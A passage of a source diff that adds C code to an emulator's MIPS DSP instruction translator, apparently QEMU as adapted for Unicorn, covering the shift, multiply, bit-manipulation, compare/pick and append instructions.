OPC_SHRAV_PW: + check_dsp(ctx); + gen_helper_shra_pw(tcg_ctx, *cpu_gpr[ret], v2_t, v1_t); + break; + case OPC_SHRA_R_PW: + check_dsp(ctx); + gen_helper_shra_r_pw(tcg_ctx, *cpu_gpr[ret], v2_t, t0); + break; + case OPC_SHRAV_R_PW: + check_dsp(ctx); + gen_helper_shra_r_pw(tcg_ctx, 
*cpu_gpr[ret], v2_t, v1_t); + break; + case OPC_SHRA_QH: + check_dsp(ctx); + gen_helper_shra_qh(tcg_ctx, *cpu_gpr[ret], v2_t, t0); + break; + case OPC_SHRAV_QH: + check_dsp(ctx); + gen_helper_shra_qh(tcg_ctx, *cpu_gpr[ret], v2_t, v1_t); + break; + case OPC_SHRA_R_QH: + check_dsp(ctx); + gen_helper_shra_r_qh(tcg_ctx, *cpu_gpr[ret], v2_t, t0); + break; + case OPC_SHRAV_R_QH: + check_dsp(ctx); + gen_helper_shra_r_qh(tcg_ctx, *cpu_gpr[ret], v2_t, v1_t); + break; + case OPC_SHRL_OB: + check_dsp(ctx); + gen_helper_shrl_ob(tcg_ctx, *cpu_gpr[ret], v2_t, t0); + break; + case OPC_SHRLV_OB: + check_dsp(ctx); + gen_helper_shrl_ob(tcg_ctx, *cpu_gpr[ret], v2_t, v1_t); + break; + case OPC_SHRL_QH: + check_dspr2(ctx); + gen_helper_shrl_qh(tcg_ctx, *cpu_gpr[ret], v2_t, t0); + break; + case OPC_SHRLV_QH: + check_dspr2(ctx); + gen_helper_shrl_qh(tcg_ctx, *cpu_gpr[ret], v2_t, v1_t); + break; + default: /* Invalid */ + MIPS_INVAL("MASK SHLL.OB"); + generate_exception(ctx, EXCP_RI); + break; + } + break; +#endif + } + + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, v1_t); + tcg_temp_free(tcg_ctx, v2_t); + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s", opn); +} + +static void gen_mipsdsp_multiply(DisasContext *ctx, uint32_t op1, uint32_t op2, + int ret, int v1, int v2, int check_ret) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "mipsdsp multiply"; + TCGv_i32 t0; + TCGv v1_t; + TCGv v2_t; + + if ((ret == 0) && (check_ret == 1)) { + /* Treat as NOP. */ + MIPS_DEBUG("NOP"); + return; + } + + t0 = tcg_temp_new_i32(tcg_ctx); + v1_t = tcg_temp_new(tcg_ctx); + v2_t = tcg_temp_new(tcg_ctx); + + tcg_gen_movi_i32(tcg_ctx, t0, ret); + gen_load_gpr(ctx, v1_t, v1); + gen_load_gpr(ctx, v2_t, v2); + + switch (op1) { + /* OPC_MULT_G_2E, OPC_ADDUH_QB_DSP, OPC_MUL_PH_DSP have + * the same mask and op1. 
*/ + case OPC_MULT_G_2E: + check_dspr2(ctx); + switch (op2) { + case OPC_MUL_PH: + gen_helper_mul_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MUL_S_PH: + gen_helper_mul_s_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MULQ_S_W: + gen_helper_mulq_s_w(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MULQ_RS_W: + gen_helper_mulq_rs_w(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + } + break; + case OPC_DPA_W_PH_DSP: + switch (op2) { + case OPC_DPAU_H_QBL: + check_dsp(ctx); + gen_helper_dpau_h_qbl(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPAU_H_QBR: + check_dsp(ctx); + gen_helper_dpau_h_qbr(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPSU_H_QBL: + check_dsp(ctx); + gen_helper_dpsu_h_qbl(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPSU_H_QBR: + check_dsp(ctx); + gen_helper_dpsu_h_qbr(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPA_W_PH: + check_dspr2(ctx); + gen_helper_dpa_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPAX_W_PH: + check_dspr2(ctx); + gen_helper_dpax_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPAQ_S_W_PH: + check_dsp(ctx); + gen_helper_dpaq_s_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPAQX_S_W_PH: + check_dspr2(ctx); + gen_helper_dpaqx_s_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPAQX_SA_W_PH: + check_dspr2(ctx); + gen_helper_dpaqx_sa_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPS_W_PH: + check_dspr2(ctx); + gen_helper_dps_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPSX_W_PH: + check_dspr2(ctx); + gen_helper_dpsx_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPSQ_S_W_PH: + check_dsp(ctx); + gen_helper_dpsq_s_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPSQX_S_W_PH: + 
check_dspr2(ctx); + gen_helper_dpsqx_s_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPSQX_SA_W_PH: + check_dspr2(ctx); + gen_helper_dpsqx_sa_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MULSAQ_S_W_PH: + check_dsp(ctx); + gen_helper_mulsaq_s_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPAQ_SA_L_W: + check_dsp(ctx); + gen_helper_dpaq_sa_l_w(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPSQ_SA_L_W: + check_dsp(ctx); + gen_helper_dpsq_sa_l_w(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MAQ_S_W_PHL: + check_dsp(ctx); + gen_helper_maq_s_w_phl(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MAQ_S_W_PHR: + check_dsp(ctx); + gen_helper_maq_s_w_phr(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MAQ_SA_W_PHL: + check_dsp(ctx); + gen_helper_maq_sa_w_phl(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MAQ_SA_W_PHR: + check_dsp(ctx); + gen_helper_maq_sa_w_phr(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MULSA_W_PH: + check_dspr2(ctx); + gen_helper_mulsa_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + } + break; +#ifdef TARGET_MIPS64 + case OPC_DPAQ_W_QH_DSP: + { + int ac = ret & 0x03; + tcg_gen_movi_i32(tcg_ctx, t0, ac); + + switch (op2) { + case OPC_DMADD: + check_dsp(ctx); + gen_helper_dmadd(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_DMADDU: + check_dsp(ctx); + gen_helper_dmaddu(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_DMSUB: + check_dsp(ctx); + gen_helper_dmsub(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_DMSUBU: + check_dsp(ctx); + gen_helper_dmsubu(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_DPA_W_QH: + check_dspr2(ctx); + gen_helper_dpa_w_qh(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_DPAQ_S_W_QH: + check_dsp(ctx); + gen_helper_dpaq_s_w_qh(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + 
break; + case OPC_DPAQ_SA_L_PW: + check_dsp(ctx); + gen_helper_dpaq_sa_l_pw(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_DPAU_H_OBL: + check_dsp(ctx); + gen_helper_dpau_h_obl(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_DPAU_H_OBR: + check_dsp(ctx); + gen_helper_dpau_h_obr(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_DPS_W_QH: + check_dspr2(ctx); + gen_helper_dps_w_qh(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_DPSQ_S_W_QH: + check_dsp(ctx); + gen_helper_dpsq_s_w_qh(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_DPSQ_SA_L_PW: + check_dsp(ctx); + gen_helper_dpsq_sa_l_pw(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_DPSU_H_OBL: + check_dsp(ctx); + gen_helper_dpsu_h_obl(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_DPSU_H_OBR: + check_dsp(ctx); + gen_helper_dpsu_h_obr(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_MAQ_S_L_PWL: + check_dsp(ctx); + gen_helper_maq_s_l_pwl(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_MAQ_S_L_PWR: + check_dsp(ctx); + gen_helper_maq_s_l_pwr(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_MAQ_S_W_QHLL: + check_dsp(ctx); + gen_helper_maq_s_w_qhll(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_MAQ_SA_W_QHLL: + check_dsp(ctx); + gen_helper_maq_sa_w_qhll(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_MAQ_S_W_QHLR: + check_dsp(ctx); + gen_helper_maq_s_w_qhlr(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_MAQ_SA_W_QHLR: + check_dsp(ctx); + gen_helper_maq_sa_w_qhlr(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_MAQ_S_W_QHRL: + check_dsp(ctx); + gen_helper_maq_s_w_qhrl(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_MAQ_SA_W_QHRL: + check_dsp(ctx); + gen_helper_maq_sa_w_qhrl(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_MAQ_S_W_QHRR: + check_dsp(ctx); + 
gen_helper_maq_s_w_qhrr(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_MAQ_SA_W_QHRR: + check_dsp(ctx); + gen_helper_maq_sa_w_qhrr(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_MULSAQ_S_L_PW: + check_dsp(ctx); + gen_helper_mulsaq_s_l_pw(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_MULSAQ_S_W_QH: + check_dsp(ctx); + gen_helper_mulsaq_s_w_qh(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + } + } + break; +#endif + case OPC_ADDU_QB_DSP: + switch (op2) { + case OPC_MULEU_S_PH_QBL: + check_dsp(ctx); + gen_helper_muleu_s_ph_qbl(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MULEU_S_PH_QBR: + check_dsp(ctx); + gen_helper_muleu_s_ph_qbr(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MULQ_RS_PH: + check_dsp(ctx); + gen_helper_mulq_rs_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MULEQ_S_W_PHL: + check_dsp(ctx); + gen_helper_muleq_s_w_phl(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MULEQ_S_W_PHR: + check_dsp(ctx); + gen_helper_muleq_s_w_phr(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MULQ_S_PH: + check_dspr2(ctx); + gen_helper_mulq_s_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + } + break; +#ifdef TARGET_MIPS64 + case OPC_ADDU_OB_DSP: + switch (op2) { + case OPC_MULEQ_S_PW_QHL: + check_dsp(ctx); + gen_helper_muleq_s_pw_qhl(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MULEQ_S_PW_QHR: + check_dsp(ctx); + gen_helper_muleq_s_pw_qhr(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MULEU_S_QH_OBL: + check_dsp(ctx); + gen_helper_muleu_s_qh_obl(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MULEU_S_QH_OBR: + check_dsp(ctx); + gen_helper_muleu_s_qh_obr(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MULQ_RS_QH: + check_dsp(ctx); + 
gen_helper_mulq_rs_qh(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + } + break; +#endif + } + + tcg_temp_free_i32(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, v1_t); + tcg_temp_free(tcg_ctx, v2_t); + + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s", opn); + +} + +static void gen_mipsdsp_bitinsn(DisasContext *ctx, uint32_t op1, uint32_t op2, + int ret, int val) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "mipsdsp Bit/ Manipulation"; + int16_t imm; + TCGv t0; + TCGv val_t; + + if (ret == 0) { + /* Treat as NOP. */ + MIPS_DEBUG("NOP"); + return; + } + + t0 = tcg_temp_new(tcg_ctx); + val_t = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, val_t, val); + + switch (op1) { + case OPC_ABSQ_S_PH_DSP: + switch (op2) { + case OPC_BITREV: + check_dsp(ctx); + gen_helper_bitrev(tcg_ctx, *cpu_gpr[ret], val_t); + break; + case OPC_REPL_QB: + check_dsp(ctx); + { + target_long result; + imm = (ctx->opcode >> 16) & 0xFF; + result = (uint32_t)imm << 24 | + (uint32_t)imm << 16 | + (uint32_t)imm << 8 | + (uint32_t)imm; + result = (int32_t)result; + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[ret], result); + } + break; + case OPC_REPLV_QB: + check_dsp(ctx); + tcg_gen_ext8u_tl(tcg_ctx, *cpu_gpr[ret], val_t); + tcg_gen_shli_tl(tcg_ctx, t0, *cpu_gpr[ret], 8); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[ret], *cpu_gpr[ret], t0); + tcg_gen_shli_tl(tcg_ctx, t0, *cpu_gpr[ret], 16); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[ret], *cpu_gpr[ret], t0); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[ret], *cpu_gpr[ret]); + break; + case OPC_REPL_PH: + check_dsp(ctx); + { + imm = (ctx->opcode >> 16) & 0x03FF; + imm = (int16_t)(imm << 6) >> 6; + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[ret], \ + (target_long)((int32_t)((uint32_t)imm << 16) | \ + (uint16_t)imm)); + } + break; + case OPC_REPLV_PH: + check_dsp(ctx); + tcg_gen_ext16u_tl(tcg_ctx, *cpu_gpr[ret], val_t); + tcg_gen_shli_tl(tcg_ctx, t0, *cpu_gpr[ret], 16); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[ret], 
*cpu_gpr[ret], t0); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[ret], *cpu_gpr[ret]); + break; + } + break; +#ifdef TARGET_MIPS64 + case OPC_ABSQ_S_QH_DSP: + switch (op2) { + case OPC_REPL_OB: + check_dsp(ctx); + { + target_long temp; + + imm = (ctx->opcode >> 16) & 0xFF; + temp = ((uint64_t)imm << 8) | (uint64_t)imm; + temp = (temp << 16) | temp; + temp = (temp << 32) | temp; + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[ret], temp); + break; + } + case OPC_REPL_PW: + check_dsp(ctx); + { + target_long temp; + + imm = (ctx->opcode >> 16) & 0x03FF; + imm = (int16_t)(imm << 6) >> 6; + temp = ((target_long)imm << 32) \ + | ((target_long)imm & 0xFFFFFFFF); + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[ret], temp); + break; + } + case OPC_REPL_QH: + check_dsp(ctx); + { + target_long temp; + + imm = (ctx->opcode >> 16) & 0x03FF; + imm = (int16_t)(imm << 6) >> 6; + + temp = ((uint64_t)(uint16_t)imm << 48) | + ((uint64_t)(uint16_t)imm << 32) | + ((uint64_t)(uint16_t)imm << 16) | + (uint64_t)(uint16_t)imm; + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[ret], temp); + break; + } + case OPC_REPLV_OB: + check_dsp(ctx); + tcg_gen_ext8u_tl(tcg_ctx, *cpu_gpr[ret], val_t); + tcg_gen_shli_tl(tcg_ctx, t0, *cpu_gpr[ret], 8); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[ret], *cpu_gpr[ret], t0); + tcg_gen_shli_tl(tcg_ctx, t0, *cpu_gpr[ret], 16); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[ret], *cpu_gpr[ret], t0); + tcg_gen_shli_tl(tcg_ctx, t0, *cpu_gpr[ret], 32); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[ret], *cpu_gpr[ret], t0); + break; + case OPC_REPLV_PW: + check_dsp(ctx); + tcg_gen_ext32u_i64(tcg_ctx, *cpu_gpr[ret], val_t); + tcg_gen_shli_tl(tcg_ctx, t0, *cpu_gpr[ret], 32); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[ret], *cpu_gpr[ret], t0); + break; + case OPC_REPLV_QH: + check_dsp(ctx); + tcg_gen_ext16u_tl(tcg_ctx, *cpu_gpr[ret], val_t); + tcg_gen_shli_tl(tcg_ctx, t0, *cpu_gpr[ret], 16); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[ret], *cpu_gpr[ret], t0); + tcg_gen_shli_tl(tcg_ctx, t0, *cpu_gpr[ret], 32); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[ret], *cpu_gpr[ret], 
t0); + break; + } + break; +#endif + } + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, val_t); + + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s", opn); +} + +static void gen_mipsdsp_add_cmp_pick(DisasContext *ctx, + uint32_t op1, uint32_t op2, + int ret, int v1, int v2, int check_ret) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "mipsdsp add compare pick"; + TCGv t1; + TCGv v1_t; + TCGv v2_t; + + if ((ret == 0) && (check_ret == 1)) { + /* Treat as NOP. */ + MIPS_DEBUG("NOP"); + return; + } + + t1 = tcg_temp_new(tcg_ctx); + v1_t = tcg_temp_new(tcg_ctx); + v2_t = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, v1_t, v1); + gen_load_gpr(ctx, v2_t, v2); + + switch (op1) { + case OPC_CMPU_EQ_QB_DSP: + switch (op2) { + case OPC_CMPU_EQ_QB: + check_dsp(ctx); + gen_helper_cmpu_eq_qb(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMPU_LT_QB: + check_dsp(ctx); + gen_helper_cmpu_lt_qb(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMPU_LE_QB: + check_dsp(ctx); + gen_helper_cmpu_le_qb(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMPGU_EQ_QB: + check_dsp(ctx); + gen_helper_cmpgu_eq_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_CMPGU_LT_QB: + check_dsp(ctx); + gen_helper_cmpgu_lt_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_CMPGU_LE_QB: + check_dsp(ctx); + gen_helper_cmpgu_le_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_CMPGDU_EQ_QB: + check_dspr2(ctx); + gen_helper_cmpgu_eq_qb(tcg_ctx, t1, v1_t, v2_t); + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[ret], t1); + tcg_gen_andi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_dspctrl, *(TCGv *)tcg_ctx->cpu_dspctrl, 0xF0FFFFFF); + tcg_gen_shli_tl(tcg_ctx, t1, t1, 24); + tcg_gen_or_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_dspctrl, *(TCGv *)tcg_ctx->cpu_dspctrl, t1); + break; + case OPC_CMPGDU_LT_QB: + check_dspr2(ctx); + gen_helper_cmpgu_lt_qb(tcg_ctx, t1, v1_t, v2_t); + tcg_gen_mov_tl(tcg_ctx, 
*cpu_gpr[ret], t1); + tcg_gen_andi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_dspctrl, *(TCGv *)tcg_ctx->cpu_dspctrl, 0xF0FFFFFF); + tcg_gen_shli_tl(tcg_ctx, t1, t1, 24); + tcg_gen_or_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_dspctrl, *(TCGv *)tcg_ctx->cpu_dspctrl, t1); + break; + case OPC_CMPGDU_LE_QB: + check_dspr2(ctx); + gen_helper_cmpgu_le_qb(tcg_ctx, t1, v1_t, v2_t); + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[ret], t1); + tcg_gen_andi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_dspctrl, *(TCGv *)tcg_ctx->cpu_dspctrl, 0xF0FFFFFF); + tcg_gen_shli_tl(tcg_ctx, t1, t1, 24); + tcg_gen_or_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_dspctrl, *(TCGv *)tcg_ctx->cpu_dspctrl, t1); + break; + case OPC_CMP_EQ_PH: + check_dsp(ctx); + gen_helper_cmp_eq_ph(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMP_LT_PH: + check_dsp(ctx); + gen_helper_cmp_lt_ph(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMP_LE_PH: + check_dsp(ctx); + gen_helper_cmp_le_ph(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_PICK_QB: + check_dsp(ctx); + gen_helper_pick_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_PICK_PH: + check_dsp(ctx); + gen_helper_pick_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_PACKRL_PH: + check_dsp(ctx); + gen_helper_packrl_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + } + break; +#ifdef TARGET_MIPS64 + case OPC_CMPU_EQ_OB_DSP: + switch (op2) { + case OPC_CMP_EQ_PW: + check_dsp(ctx); + gen_helper_cmp_eq_pw(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMP_LT_PW: + check_dsp(ctx); + gen_helper_cmp_lt_pw(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMP_LE_PW: + check_dsp(ctx); + gen_helper_cmp_le_pw(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMP_EQ_QH: + check_dsp(ctx); + gen_helper_cmp_eq_qh(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMP_LT_QH: + check_dsp(ctx); + gen_helper_cmp_lt_qh(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMP_LE_QH: 
+ check_dsp(ctx); + gen_helper_cmp_le_qh(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMPGDU_EQ_OB: + check_dspr2(ctx); + gen_helper_cmpgdu_eq_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMPGDU_LT_OB: + check_dspr2(ctx); + gen_helper_cmpgdu_lt_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMPGDU_LE_OB: + check_dspr2(ctx); + gen_helper_cmpgdu_le_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMPGU_EQ_OB: + check_dsp(ctx); + gen_helper_cmpgu_eq_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_CMPGU_LT_OB: + check_dsp(ctx); + gen_helper_cmpgu_lt_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_CMPGU_LE_OB: + check_dsp(ctx); + gen_helper_cmpgu_le_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_CMPU_EQ_OB: + check_dsp(ctx); + gen_helper_cmpu_eq_ob(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMPU_LT_OB: + check_dsp(ctx); + gen_helper_cmpu_lt_ob(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMPU_LE_OB: + check_dsp(ctx); + gen_helper_cmpu_le_ob(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_PACKRL_PW: + check_dsp(ctx); + gen_helper_packrl_pw(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_PICK_OB: + check_dsp(ctx); + gen_helper_pick_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_PICK_PW: + check_dsp(ctx); + gen_helper_pick_pw(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_PICK_QH: + check_dsp(ctx); + gen_helper_pick_qh(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + } + break; +#endif + } + + tcg_temp_free(tcg_ctx, t1); + tcg_temp_free(tcg_ctx, v1_t); + tcg_temp_free(tcg_ctx, v2_t); + + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s", opn); +} + +static void gen_mipsdsp_append(CPUMIPSState *env, DisasContext *ctx, + uint32_t op1, int rt, int rs, int sa) +{ + TCGContext *tcg_ctx = 
ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "mipsdsp append/dappend"; + TCGv t0; + + check_dspr2(ctx); + + if (rt == 0) { + /* Treat as NOP. */ + MIPS_DEBUG("NOP"); + return; + } + + t0 = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, t0, rs); + + switch (op1) { + case OPC_APPEND_DSP: + switch (MASK_APPEND(ctx->opcode)) { + case OPC_APPEND: + if (sa != 0) { + tcg_gen_deposit_tl(tcg_ctx, *cpu_gpr[rt], t0, *cpu_gpr[rt], sa, 32 - sa); + } + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt]); + break; + case OPC_PREPEND: + if (sa != 0) { + tcg_gen_ext32u_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt]); + tcg_gen_shri_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt], sa); + tcg_gen_shli_tl(tcg_ctx, t0, t0, 32 - sa); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt], t0); + } + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt]); + break; + case OPC_BALIGN: + sa &= 3; + if (sa != 0 && sa != 2) { + tcg_gen_shli_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt], 8 * sa); + tcg_gen_ext32u_tl(tcg_ctx, t0, t0); + tcg_gen_shri_tl(tcg_ctx, t0, t0, 8 * (4 - sa)); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt], t0); + } + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt]); + break; + default: /* Invalid */ + MIPS_INVAL("MASK APPEND"); + generate_exception(ctx, EXCP_RI); + break; + } + break; +#ifdef TARGET_MIPS64 + case OPC_DAPPEND_DSP: + switch (MASK_DAPPEND(ctx->opcode)) { + case OPC_DAPPEND: 